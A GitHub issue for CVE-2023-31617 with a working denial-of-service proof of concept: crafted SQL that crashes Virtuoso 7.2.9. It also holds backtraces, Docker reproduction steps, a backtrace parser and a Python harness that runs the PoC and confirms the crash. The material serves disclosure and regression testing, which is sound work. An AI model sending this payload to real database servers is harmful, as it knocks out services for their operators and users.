CVE-2023-31617: virtuoso 7.2.9 crashed at dk_set_delete · Issue #1127 · openlink/virtuoso-opensource
An issue in the dk_set_delete component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f VARCHAR(80) );
SELECT -(coalesce((select max(coalesce((select b.f from b where not exists(select 1 from b where (abs(+rootid+19+19)/abs(b.rootid))<b.rootid) or 19+f>=(select -max(19) from b)+b.f),b.e+b.f)* -b.e+19-f) from b where (( -b.id<19) or d>=id)),b.id))*id*((b.rootid))-17 FROM b WHERE NOT (b.e not between b.f*id and b.f+ -d);
backtrace (two stacks were posted; the frame numbers restart at #0 where the second one begins):

first backtrace, dk_set_delete reached from sql_compile_1 via sqlg_vector:
#0 0xe05b99 (dk_set_delete+0x39)
#1 0x7ff2b5 (sqlg_vec_qns+0x365)
#2 0x7fcfc7 (cv_vec_slots+0x947)
#3 0x7fc563 (sqlg_vec_after_test+0x1b3)
#4 0x80148f (qn_vec_slots+0x61f)
#5 0x7ff412 (sqlg_vec_qns+0x4c2)
#6 0x81464c (sqlg_vector_subq+0xdc)
#7 0x814d91 (sqlg_vector+0x61)
#8 0x6baa15 (sql_compile_1+0x2355)
#9 0x7c8cd0 (stmt_set_query+0x340)
#10 0x7cabc2 (sf_sql_execute+0x922)
#11 0x7cbf4e (sf_sql_execute_w+0x17e)
#12 0x7d4c0d (sf_sql_execute_wrapper+0x3d)
#13 0xe1f01c (future_wrapper+0x3fc)
#14 0xe2691e (_thread_boot+0x11e)
#15 0x7fc16f67c609 (start_thread+0xd9)
#16 0x7fc16f44c133 (clone+0x43)

second backtrace, gpf_notice reached from srv_client_session_died via cli_scrap_cached_statements and qr_free:
#0 0xe10319 (gpf_notice+0x209)
#1 0xde599f (dk_free_box+0x2df)
#2 0x6b35cc (fun_ref_free+0x4c)
#3 0x50498d (qr_free+0x2ad)
#4 0x504a1c (qr_free+0x33c)
#5 0x504a1c (qr_free+0x33c)
#6 0x504a1c (qr_free+0x33c)
#7 0x504a1c (qr_free+0x33c)
#8 0x7c4def (cli_scrap_cached_statements+0x41f)
#9 0x7c53f5 (client_connection_free+0x265)
#10 0x7c6365 (srv_client_connection_died+0x205)
#11 0x7c652d (srv_client_session_died+0x2d)
#12 0xe14dff (session_is_dead+0x6f)
#13 0xe1f3d0 (future_wrapper+0x7b0)
#14 0xe2691e (_thread_boot+0x11e)
#15 0x7fefc040b609 (start_thread+0xd9)
#16 0x7fefc01db133 (clone+0x43)
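The backtrace as posted is a single run of frames, which hides that it is really two stacks: one from the crash itself and one from connection teardown afterwards. The following parser is an added example (not code from the issue reporter or from the Virtuoso project) that splits a dump in Virtuoso's "#N 0xADDR (symbol+0xOFF)" format into separate stacks wherever the frame index resets to #0, and summarises each one. The input is the backtrace copied verbatim from the report above; the frame format and the choice of which frames count as thread bootstrap are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# The two stacks exactly as posted in the issue (copied from the report, not constructed).
BACKTRACE = (
    "#0 0xe05b99 (dk_set_delete+0x39) #1 0x7ff2b5 (sqlg_vec_qns+0x365) "
    "#2 0x7fcfc7 (cv_vec_slots+0x947) #3 0x7fc563 (sqlg_vec_after_test+0x1b3) "
    "#4 0x80148f (qn_vec_slots+0x61f) #5 0x7ff412 (sqlg_vec_qns+0x4c2) "
    "#6 0x81464c (sqlg_vector_subq+0xdc) #7 0x814d91 (sqlg_vector+0x61) "
    "#8 0x6baa15 (sql_compile_1+0x2355) #9 0x7c8cd0 (stmt_set_query+0x340) "
    "#10 0x7cabc2 (sf_sql_execute+0x922) #11 0x7cbf4e (sf_sql_execute_w+0x17e) "
    "#12 0x7d4c0d (sf_sql_execute_wrapper+0x3d) #13 0xe1f01c (future_wrapper+0x3fc) "
    "#14 0xe2691e (_thread_boot+0x11e) #15 0x7fc16f67c609 (start_thread+0xd9) "
    "#16 0x7fc16f44c133 (clone+0x43) "
    "#0 0xe10319 (gpf_notice+0x209) #1 0xde599f (dk_free_box+0x2df) "
    "#2 0x6b35cc (fun_ref_free+0x4c) #3 0x50498d (qr_free+0x2ad) "
    "#4 0x504a1c (qr_free+0x33c) #5 0x504a1c (qr_free+0x33c) "
    "#6 0x504a1c (qr_free+0x33c) #7 0x504a1c (qr_free+0x33c) "
    "#8 0x7c4def (cli_scrap_cached_statements+0x41f) #9 0x7c53f5 (client_connection_free+0x265) "
    "#10 0x7c6365 (srv_client_connection_died+0x205) #11 0x7c652d (srv_client_session_died+0x2d) "
    "#12 0xe14dff (session_is_dead+0x6f) #13 0xe1f3d0 (future_wrapper+0x7b0) "
    "#14 0xe2691e (_thread_boot+0x11e) #15 0x7fefc040b609 (start_thread+0xd9) "
    "#16 0x7fefc01db133 (clone+0x43)"
)

# One frame in the dump format used above (assumed format: "#N 0xADDR (symbol+0xOFF)").
FRAME_RE = re.compile(r"#(\d+)\s+(0x[0-9a-fA-F]+)\s+\(([^()+]+)\+(0x[0-9a-fA-F]+)\)")

# Thread start-up frames that appear at the bottom of every stack and say nothing about the crash.
THREAD_FRAMES = {"_thread_boot", "start_thread", "clone"}


@dataclass(frozen=True)
class Frame:
    index: int
    address: int
    function: str
    offset: int


def parse_backtraces(text):
    """Split a flattened dump into separate stacks; a new stack starts at every frame #0."""
    stacks = []
    for m in FRAME_RE.finditer(text):
        frame = Frame(int(m.group(1)), int(m.group(2), 16), m.group(3), int(m.group(4), 16))
        if frame.index == 0 or not stacks:
            stacks.append([])
        stacks[-1].append(frame)
    return stacks


def call_chain(stack):
    """Function names from outermost caller to the crashing function, bootstrap frames dropped."""
    return [f.function for f in reversed(stack) if f.function not in THREAD_FRAMES]


def summarize(stack):
    """Triage view of one stack: where it died, where the thread's work started, and whether
    the crash happened inside SQL compilation (sql_compile_1 on the stack)."""
    chain = call_chain(stack)
    return {
        "crash_site": f"{stack[0].function}+{stack[0].offset:#x}",
        "entry": chain[0],
        "depth": len(chain),
        "via_sql_compile": "sql_compile_1" in chain,
    }


if __name__ == "__main__":
    for n, stack in enumerate(parse_backtraces(BACKTRACE), 1):
        print(f"stack {n}: {summarize(stack)}")
        print("  " + " -> ".join(call_chain(stack)))
```

Run stand-alone it prints two stacks: the first dies in dk_set_delete with sql_compile_1 on the stack, so the crash is reached while compiling the crafted statement, before any row is read; the second dies in gpf_notice under qr_free while the cached statement is freed as the client session is torn down.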
Ways to reproduce (write the PoC to the file '/tmp/test.sql' first):
# remove the old one
docker container rm virtdb_test -f
# start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.9
# wait for the server to start
sleep 10
# check whether a simple query works
echo "SELECT 1;" | docker exec -i virtdb_test isql 1111 dba
# run the poc
docker exec -i virtdb_test isql 1111 dba < "/tmp/test.sql"
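The steps above rely on a fixed sleep and on eyeballing the isql output, so they do not by themselves distinguish a server that crashed from one that merely rejected the statement. The harness below is an added example (not the reporter's script and not Virtuoso project code) that automates the same procedure with a readiness poll in place of the sleep and a post-PoC liveness check: it only reports the DoS as reproduced when SELECT 1 succeeded before the PoC and fails afterwards. It assumes a docker CLI on the host, the image, container name, port and DBA_PASSWORD from the steps above, and that isql exits non-zero when it cannot reach the server (an assumption of this example).

```python
import subprocess
import sys
import time

# Names taken from the reproduction steps in the issue.
CONTAINER = "virtdb_test"
IMAGE = "openlink/virtuoso-opensource-7:7.2.9"
DBA_PASSWORD = "dba"  # matches --env DBA_PASSWORD=dba in the steps above

# The PoC statements exactly as posted in the issue.
POC_SQL = """CREATE TABLE b ( folders VARCHAR(80), folderid VARCHAR(80), parentid VARCHAR(80), rootid VARCHAR(80), c INTEGER, path VARCHAR(80), id VARCHAR(80), i VARCHAR(80), d VARCHAR(80), e VARCHAR(80), f VARCHAR(80) );
SELECT -(coalesce((select max(coalesce((select b.f from b where not exists(select 1 from b where (abs(+rootid+19+19)/abs(b.rootid))<b.rootid) or 19+f>=(select -max(19) from b)+b.f),b.e+b.f)* -b.e+19-f) from b where (( -b.id<19) or d>=id)),b.id))*id*((b.rootid))-17 FROM b WHERE NOT (b.e not between b.f*id and b.f+ -d);
"""


def isql_cmd(container=CONTAINER, user="dba", password=DBA_PASSWORD):
    """argv that pipes stdin into the container's isql client on port 1111, as in the issue."""
    return ["docker", "exec", "-i", container, "isql", "1111", user, password]


def run_sql(sql, timeout=30):
    """Return (exit status, combined output); exit status is None if isql hung past the timeout."""
    try:
        p = subprocess.run(isql_cmd(), input=sql.encode(), capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return None, "isql timed out"
    return p.returncode, (p.stdout + p.stderr).decode(errors="replace")


def server_answers():
    # Assumption: isql exits 0 only when it connected and ran the statement.
    rc, _ = run_sql("SELECT 1;")
    return rc == 0


def wait_ready(attempts=30, delay=1.0):
    """Poll SELECT 1 instead of 'sleep 10'; True once the listener accepts queries."""
    for _ in range(attempts):
        if server_answers():
            return True
        time.sleep(delay)
    return False


def container_running(container=CONTAINER):
    p = subprocess.run(["docker", "inspect", "-f", "{{.State.Running}}", container],
                       capture_output=True, text=True)
    return p.returncode == 0 and p.stdout.strip() == "true"


def verdict(ready_before, answers_after, running_after):
    """Only a server that answered before the PoC and not after counts as a reproduced DoS."""
    if not ready_before:
        return "inconclusive: server never became ready"
    if answers_after:
        return "not reproduced: server still answers SELECT 1 after the PoC"
    if not running_after:
        return "reproduced: server process exited, container stopped"
    return "reproduced: container still up but server no longer answers"


def reproduce():
    subprocess.run(["docker", "container", "rm", CONTAINER, "-f"], capture_output=True)
    subprocess.run(["docker", "run", "--name", CONTAINER, "-itd",
                    "--env", f"DBA_PASSWORD={DBA_PASSWORD}", IMAGE], check=True)
    ready = wait_ready()
    if ready:
        rc, out = run_sql(POC_SQL)
        print(f"poc isql exit status={rc}\n{out}")
    answers = server_answers() if ready else False
    return verdict(ready, answers, container_running())


if __name__ == "__main__":
    result = reproduce()
    print(result)
    sys.exit(0 if result.startswith("reproduced") else 1)
```

Running it against the 7.2.9 image from the issue should print a "reproduced" verdict; running the same script against a build that carries the fix is the regression check, and should print "not reproduced".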
Related news
Ubuntu Security Notice 6832-1 - Jingzhou Fu discovered that Virtuoso Open-Source Edition incorrectly handled certain crafted SQL statements. An attacker could possibly use this issue to crash the program, resulting in a denial of service. This issue only affects Ubuntu 22.04 LTS, Ubuntu 23.10 and Ubuntu 24.04 LTS.